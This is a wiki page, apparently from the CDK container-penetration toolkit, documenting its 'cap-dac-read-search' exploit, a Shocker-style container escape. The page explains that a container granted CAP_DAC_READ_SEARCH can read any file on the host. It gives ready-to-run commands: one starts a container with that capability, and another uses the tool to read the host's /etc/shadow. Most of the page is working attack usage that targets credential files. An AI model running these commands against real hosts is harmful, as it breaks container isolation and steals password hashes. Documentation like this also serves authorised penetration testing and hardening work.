Skip to content

Exploit: cap dac read search

Jump to bottom
neargle edited this page May 6, 2021 · 4 revisions

Exploit: cap-dac-read-search

Thanks @nikitastupin.

If container is run with CAP_DAC_READ_SEARCH capability it is able to read arbitrary file from host system. This is possible because CAP_DAC_READ_SEARCH gives ability to bypass DAC (discretionary access control) checks and open files by file handles which are global file identifiers. Original exploit can be found at http://stealth.openwall.net/xSports/shocker.c.

Usage

cdk run cap-dac-read-search <target> <ref>
# read target file from host. First argument is target file. Second argument is file bind-mounted to container from host

Example

  1. Build cdk
  2. Run a docker container docker run -it --rm --cap-add CAP_DAC_READ_SEARCH -v "$(pwd)/cdk":/cdk ubuntu /bin/bash 1. Run cdk exploit inside the container cdk run cap-dac-read-search /etc/shadow /etc/hosts

You should get /etc/shadow from host:

host-shadow

Verify that /etc/shadow from container is different:

container-shadow

Clone this wiki locally